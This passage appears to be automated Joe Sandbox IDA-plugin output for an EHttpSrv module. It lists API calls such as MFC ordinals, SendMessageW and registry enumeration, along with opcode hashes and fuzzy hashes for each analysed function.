                                                                                                                • Opcode ID: b4f2627a347d5a81c19f3b90ed9b67b099448da426e5a52dbe35c8c8a3e56190
                                                                                                                • Instruction ID: 8bc0d5fc76cd60e7e419bd58047b3fc9abc88ffc0ab25ff98c7cafe0d2c59eeb
                                                                                                                • Opcode Fuzzy Hash: b4f2627a347d5a81c19f3b90ed9b67b099448da426e5a52dbe35c8c8a3e56190
                                                                                                                • Instruction Fuzzy Hash: 2D31E6703803057BE62897B48C87FEEB699AB54F08F40C61CB3586B6D0DFA8BC458794
                                                                                                                APIs
                                                                                                                • #2651.MFC80U(000003EE,00000000,?,?), ref: 2045B719
                                                                                                                • #2155.MFC80U(000003EE,00000000,?,?), ref: 2045B720
                                                                                                                • #2651.MFC80U(000004C6,00000000,000003EE,00000000,?,?), ref: 2045B72D
                                                                                                                • #2155.MFC80U(000004C6,00000000,000003EE,00000000,?,?), ref: 2045B734
                                                                                                                • #2651.MFC80U(000003F7,00000000,000004C6,00000000,000003EE,00000000,?,?), ref: 2045B745
                                                                                                                • #2155.MFC80U(000003F7,00000000,000004C6,00000000,000003EE,00000000,?,?), ref: 2045B74C
                                                                                                                • #2651.MFC80U(000004F9,00000000,000003F7,00000000,000004C6,00000000,000003EE,00000000,?,?), ref: 2045B759
                                                                                                                • #2155.MFC80U(000004F9,00000000,000003F7,00000000,000004C6,00000000,000003EE,00000000,?,?), ref: 2045B760
                                                                                                                • #2651.MFC80U(000004F9,?,000004C6,00000000), ref: 2045B778
                                                                                                                • #2651.MFC80U(000003F7,000004F9,?,000004C6,00000000), ref: 2045B78A
                                                                                                                • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 2045B7B1
                                                                                                                • #2860.MFC80U(00000000,?,?,000004C6,00000000), ref: 2045B7D5
                                                                                                                • #2155.MFC80U(00000001,?,000004C6,00000000), ref: 2045B813
                                                                                                                • #2155.MFC80U(00000000,00000001,?,000004C6,00000000), ref: 2045B823
                                                                                                                • #2155.MFC80U(00000000,?,000004C6,00000000), ref: 2045B832
                                                                                                                • #2155.MFC80U(00000000,00000000,?,000004C6,00000000), ref: 2045B83E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2155$#2651$#2860MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1451778098-0
                                                                                                                • Opcode ID: ce393c04e2335226a34f455cef0e272eb4f0d1c9f16b51af7167b89965d3b120
                                                                                                                • Instruction ID: 67a8ca9e0ab85399b09c8d6d91a4dc5d329e4d14118fc57435a7ce78afcd73f5
                                                                                                                • Opcode Fuzzy Hash: ce393c04e2335226a34f455cef0e272eb4f0d1c9f16b51af7167b89965d3b120
                                                                                                                • Instruction Fuzzy Hash: 1131C5713846019BDA01ABA48856BBE77BADBE0F08F40C53CF5464B7E0CE7C990AC752
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20402090: _wcsicmp.MSVCR80 ref: 204020FE
                                                                                                                • #1176.MFC80U(?,?,?,?,?,?,?,?,?,?,?,00000000,ADAPTER_NAME,?,?,?), ref: 2040E29E
                                                                                                                  • Part of subcall function 20401EC0: _wcsicmp.MSVCR80 ref: 20401F2E
                                                                                                                  • Part of subcall function 2040C930: #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C964
                                                                                                                  • Part of subcall function 2040C930: #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C974
                                                                                                                  • Part of subcall function 2040C930: #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C990
                                                                                                                  • Part of subcall function 2040C930: #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C9AC
                                                                                                                  • Part of subcall function 2040C930: #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C9C8
                                                                                                                  • Part of subcall function 2040C930: #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C9E7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$_wcsicmp$#1176
                                                                                                                • String ID: ($ADAPTER$ADAPTERS$ADAPTER_NAME$ADDRESS$ADDRESSES_DNS$ADDRESSES_MULTICAST$ADDRESSES_UNICAST$IP6_ADDR$IP_ADDR$NAME$SUBNET_MASK
                                                                                                                • API String ID: 1024906901-1100604650
                                                                                                                • Opcode ID: d62074c8ca693871cca77507b0ef0936bf118cca2e6a1637b2bf2ea5ef87f241
                                                                                                                • Instruction ID: aca5af3c6637ef0e943cc87965f3c7281b4ae4fd47ceedf4ca17f81ce8ee28a1
                                                                                                                • Opcode Fuzzy Hash: d62074c8ca693871cca77507b0ef0936bf118cca2e6a1637b2bf2ea5ef87f241
                                                                                                                • Instruction Fuzzy Hash: 18D1A6B14153449BC314DB95CC81FAFB3EABBD4608F408E3DF989A6241E73DA6098B53
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2043CE80: wcscpy_s.MSVCR80 ref: 2043CEAD
                                                                                                                  • Part of subcall function 2043CE80: wcscpy_s.MSVCR80 ref: 2043CEF9
                                                                                                                  • Part of subcall function 2043CE80: wcscpy_s.MSVCR80 ref: 2043CF39
                                                                                                                  • Part of subcall function 2043CE80: wcscpy_s.MSVCR80 ref: 2043CF98
                                                                                                                  • Part of subcall function 2043D210: RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000008,-00000023,6FAD4B78,?), ref: 2043D266
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 2045009D
                                                                                                                • wcscpy_s.MSVCR80 ref: 204500E5
                                                                                                                • wcsncpy_s.MSVCR80 ref: 20450103
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 20450140
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 2045014B
                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,0000000E), ref: 2045016F
                                                                                                                • wcsncmp.MSVCR80 ref: 20450190
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 2045020D
                                                                                                                • RegEnumKeyW.ADVAPI32(?,-00000001,?,0000000E), ref: 20450238
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 20450250
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 20450261
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 20450268
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s$Close$CriticalSection$EnumLeave$EnterOpenwcsncmpwcsncpy_s
                                                                                                                • String ID: Node_
                                                                                                                • API String ID: 1802429796-3995354651
                                                                                                                • Opcode ID: d14b8de77c63ef39d49a351c681705719c90754a08a61d834a833efde99d88db
                                                                                                                • Instruction ID: bc35a6ce19b864aa4decf253173c78be40daf2bb1fb0ca7fd91c94ece76f0322
                                                                                                                • Opcode Fuzzy Hash: d14b8de77c63ef39d49a351c681705719c90754a08a61d834a833efde99d88db
                                                                                                                • Instruction Fuzzy Hash: 0B61A1B5108704ABD714DFA4CC85BABB7E8BF9C708F108D1CF99597241DA39EA098B52
                                                                                                                APIs
                                                                                                                • #764.MFC80U(FF9A6AE8,FEEA6C22,00000000,00000001,?,?,?,00000000,2047EED7,000000FF), ref: 2041C662
                                                                                                                • #764.MFC80U(458BFFF9,FEEA6C22,00000000,00000001,?,?,?,00000000,2047EED7,000000FF), ref: 2041C67B
                                                                                                                • #764.MFC80U(CCCCCCCC,FEEA6C22,00000000,00000001,?,?,?,00000000,2047EED7,000000FF), ref: 2041C694
                                                                                                                • #764.MFC80U(83F0458B,FEEA6C22,00000000,00000001,?,?,?,00000000,2047EED7,000000FF), ref: 2041C6AD
                                                                                                                • #764.MFC80U(FFF99779,FEEA6C22,00000000,00000001,?,?,?,00000000,2047EED7,000000FF), ref: 2041C6C6
                                                                                                                • qsort.MSVCR80 ref: 2041C6FB
                                                                                                                • qsort.MSVCR80 ref: 2041C756
                                                                                                                • qsort.MSVCR80 ref: 2041C77C
                                                                                                                • qsort.MSVCR80 ref: 2041C7A4
                                                                                                                • qsort.MSVCR80 ref: 2041C7F4
                                                                                                                • #265.MFC80U(00000000,FEEA6C22,00000000,00000001,?,?,?,00000000,2047EED7,000000FF), ref: 2041C826
                                                                                                                • #265.MFC80U(00000000,FEEA6C22,00000000,00000001,?,?,?,00000000,2047EED7,000000FF), ref: 2041C893
                                                                                                                • #265.MFC80U(00000000,FEEA6C22,00000000,00000001,?,?,?,00000000,2047EED7,000000FF), ref: 2041C8F3
                                                                                                                • wcscpy_s.MSVCR80 ref: 2041C94E
                                                                                                                • wcsncpy_s.MSVCR80 ref: 2041C95F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764qsort$#265$wcscpy_swcsncpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 2630380505-0
                                                                                                                • Opcode ID: 527e4a909f8d4ab2249d358f0f897bcfc00e09c81ee43996ef5b6378b076cdce
                                                                                                                • Instruction ID: 7d6139fbdda4d1cc13a014d33e862f6533b6a53d91e9fdf6e56a956c0eee08b0
                                                                                                                • Opcode Fuzzy Hash: 527e4a909f8d4ab2249d358f0f897bcfc00e09c81ee43996ef5b6378b076cdce
                                                                                                                • Instruction Fuzzy Hash: DCD18AB19003088BCB14CF69CC81A9AFBE5FF98304F548A1EED559B361D7B9E945CB81
                                                                                                                APIs
                                                                                                                • #776.MFC80U(?,FEEA6C22,00000000,?,?,00000000), ref: 204464AA
                                                                                                                • #4026.MFC80U(?,?,?,00000000), ref: 20446504
                                                                                                                • #4026.MFC80U(?,?,?,?,00000000), ref: 2044651E
                                                                                                                • memset.MSVCR80 ref: 2044654F
                                                                                                                • free.MSVCR80 ref: 2044655C
                                                                                                                • #5149.MFC80U(00000080,?,?,?,00000000), ref: 20446590
                                                                                                                • #5398.MFC80U(000000FF,00000080,?,?,?,00000000), ref: 204465B0
                                                                                                                • #774.MFC80U(?,?,?,?,00000000), ref: 204465D0
                                                                                                                • #4026.MFC80U(000001D2,?,?,?,00000000), ref: 204465E1
                                                                                                                • #762.MFC80U(0000044C,?,?,?,00000000), ref: 204465EC
                                                                                                                • memset.MSVCR80 ref: 20446654
                                                                                                                • free.MSVCR80 ref: 20446661
                                                                                                                • #2461.MFC80U(?,?,?,00000000,?,?,?,?,00000000), ref: 204466DA
                                                                                                                • #774.MFC80U ref: 20446707
                                                                                                                • #774.MFC80U(?), ref: 20446714
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4026#774$freememset$#2461#5149#5398#762#776
                                                                                                                • String ID:
                                                                                                                • API String ID: 581628281-0
                                                                                                                • Opcode ID: 98a892b8d0df8cd6ef370fa9880814b123266298d9cd77d375af763eb087fec2
                                                                                                                • Instruction ID: f67a0cb9749c766af282978b63d155dd4df52af9296faa6f0a75167341ba6a5e
                                                                                                                • Opcode Fuzzy Hash: 98a892b8d0df8cd6ef370fa9880814b123266298d9cd77d375af763eb087fec2
                                                                                                                • Instruction Fuzzy Hash: AD8180719043849FDB24CF94CC95BDEB7A4BF44704F00C92EFA4A9B250DB79AA09CB52
                                                                                                                APIs
                                                                                                                • #4574.MFC80U ref: 204614A5
                                                                                                                • GetClientRect.USER32(?,?), ref: 204614B3
                                                                                                                • #2651.MFC80U(000004C6,0000000F), ref: 204614E4
                                                                                                                  • Part of subcall function 2045D0A0: GetParent.USER32(?), ref: 2045D0B0
                                                                                                                  • Part of subcall function 2045D0A0: #2366.MFC80U(00000000), ref: 2045D0B7
                                                                                                                  • Part of subcall function 2045D0A0: #4109.MFC80U(00000000,02000000,00000000), ref: 2045D0D7
                                                                                                                  • Part of subcall function 2045D0A0: GetClientRect.USER32(?,?), ref: 2045D0F1
                                                                                                                  • Part of subcall function 2045D0A0: GetWindowRect.USER32(?,00000000), ref: 2045D116
                                                                                                                  • Part of subcall function 2045D0A0: #5609.MFC80U(00000000), ref: 2045D123
                                                                                                                  • Part of subcall function 2045D0A0: malloc.MSVCR80 ref: 2045D12A
                                                                                                                  • Part of subcall function 2045D0A0: #5713.MFC80U(?,00000000), ref: 2045D177
                                                                                                                • #2651.MFC80U(00000428,00000009,000004C6,0000000F), ref: 204614F9
                                                                                                                • #2651.MFC80U(00000499,00000009,00000428,00000009,000004C6,0000000F), ref: 2046150E
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 2046153C
                                                                                                                • #2364.MFC80U(00000000), ref: 2046153F
                                                                                                                • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 20461554
                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 20461568
                                                                                                                • #3869.MFC80U(00000000,20485878,00000000,000000C8,000000FF), ref: 20461580
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 20461595
                                                                                                                • #2651.MFC80U(00000428,00000000), ref: 204615A9
                                                                                                                • #2155.MFC80U(00000428,00000000), ref: 204615B0
                                                                                                                • #2651.MFC80U(00000499,00000000,00000428,00000000), ref: 204615BE
                                                                                                                • #2155.MFC80U(00000499,00000000,00000428,00000000), ref: 204615C5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2651$MessageSend$Rect$#2155Client$#2364#2366#3869#4109#4574#5609#5713ParentWindowmalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 4050641184-0
                                                                                                                • Opcode ID: e2ca6bff617878acf79874e4f88d9535b3bc8e2d914fbb513a8aadbeaf0642eb
                                                                                                                • Instruction ID: 8aeb6e7560911261bafd35b6296635efa155aac981d9dbe41764942a1e8cde91
                                                                                                                • Opcode Fuzzy Hash: e2ca6bff617878acf79874e4f88d9535b3bc8e2d914fbb513a8aadbeaf0642eb
                                                                                                                • Instruction Fuzzy Hash: 4031D4707803027BE62897B48C42FBEB799AB54F04F40861DB259AB6D0DFA8A8458791
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?,FEEA6C22), ref: 20441990
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 204419A5
                                                                                                                • #762.MFC80U(000002DC), ref: 204419CF
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U(00000000,FEEA6C22,00000000,?,?,00000000,00000000,20480B9B,000000FF,204419EB,00000000), ref: 20445C40
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445C51
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445C62
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445C73
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445C84
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445C95
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445CA6
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445CB7
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445CC8
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445CD9
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445CEA
                                                                                                                  • Part of subcall function 20445C00: EnterCriticalSection.KERNEL32(00003FC8,00000104), ref: 20445D13
                                                                                                                  • Part of subcall function 20445C00: LeaveCriticalSection.KERNEL32(00003FC8), ref: 20445D21
                                                                                                                  • Part of subcall function 20445C00: memset.MSVCR80 ref: 20445D2E
                                                                                                                • GetTickCount.KERNEL32 ref: 20441A95
                                                                                                                • #762.MFC80U(000005D4), ref: 20441AAD
                                                                                                                • GetTickCount.KERNEL32 ref: 20441AF1
                                                                                                                • EnterCriticalSection.KERNEL32(?,00000000), ref: 20441B3A
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 20441B4F
                                                                                                                • #762.MFC80U(000000E8), ref: 20441B63
                                                                                                                • #762.MFC80U(00000058,00000000), ref: 20441BD9
                                                                                                                • #762.MFC80U(0000007C), ref: 20441C8D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310$CriticalSection$#762$EnterLeave$CountTick$memset
                                                                                                                • String ID: }
                                                                                                                • API String ID: 2898407527-4239843852
                                                                                                                • Opcode ID: cc26bdfaaf374ea7267c643fcee85da63826c3592bafba178029d9611c036d8f
                                                                                                                • Instruction ID: 67782cbd16a6edc87daeac32aed44315c09c759a4b5c5fe1bebd17b21bd0bd1d
                                                                                                                • Opcode Fuzzy Hash: cc26bdfaaf374ea7267c643fcee85da63826c3592bafba178029d9611c036d8f
                                                                                                                • Instruction Fuzzy Hash: 3EC1C472A097418FE714CF99D881B6BB7E5FBC4761F10862EF94697390DB39A800CB91
                                                                                                                APIs
                                                                                                                • #1176.MFC80U(FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89), ref: 20412B3D
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B64
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B74
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B84
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B94
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BAD
                                                                                                                • #265.MFC80U(00000000,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BF3
                                                                                                                • memset.MSVCR80 ref: 20412C00
                                                                                                                • memset.MSVCR80 ref: 20412C7E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$memset$#1176#265
                                                                                                                • String ID:
                                                                                                                • API String ID: 2140225662-0
                                                                                                                • Opcode ID: cced180ea473a5b1e1e367befc32688df4333c8617c2ef4c693b935e30686c1a
                                                                                                                • Instruction ID: 318eaf825227baa4e4400ef08250b981e21bef2880d11851eeb8ef97de00dd19
                                                                                                                • Opcode Fuzzy Hash: cced180ea473a5b1e1e367befc32688df4333c8617c2ef4c693b935e30686c1a
                                                                                                                • Instruction Fuzzy Hash: 09A1ADB1A006159FC314CFA8DA84B56FBA4BB54A14F04C62EE819C7751E738E9A4CFD1
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(?), ref: 20430AC1
                                                                                                                • #2788.MFC80U ref: 20430ACD
                                                                                                                • IsWindow.USER32(?), ref: 20430AE0
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 20430B1B
                                                                                                                • SendMessageW.USER32(?,0000120B), ref: 20430B38
                                                                                                                • SendMessageW.USER32(?,0000120C,00000000,?), ref: 20430B74
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 20430B86
                                                                                                                • SendMessageW.USER32(?,0000120B), ref: 20430BB3
                                                                                                                • SendMessageW.USER32(?,0000120C,?,?), ref: 20430CC7
                                                                                                                • SendMessageW.USER32(?,00001030,?,20430980), ref: 20430CFB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$#2788
                                                                                                                • String ID: $
                                                                                                                • API String ID: 170428694-3993045852
                                                                                                                • Opcode ID: fa24ff3485e0c19831be8faee70d1698d032d1fc723f849b0ec9068bbd055843
                                                                                                                • Instruction ID: 5ac11d6b472a672f92059aeb1bc39d0abadbed3282ae6fcfb5d0dcd038441f01
                                                                                                                • Opcode Fuzzy Hash: fa24ff3485e0c19831be8faee70d1698d032d1fc723f849b0ec9068bbd055843
                                                                                                                • Instruction Fuzzy Hash: 8E61B4B19083549BD714CF98C850F9BBBE4AF88754F219B1DFA949B281C779EC04CB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
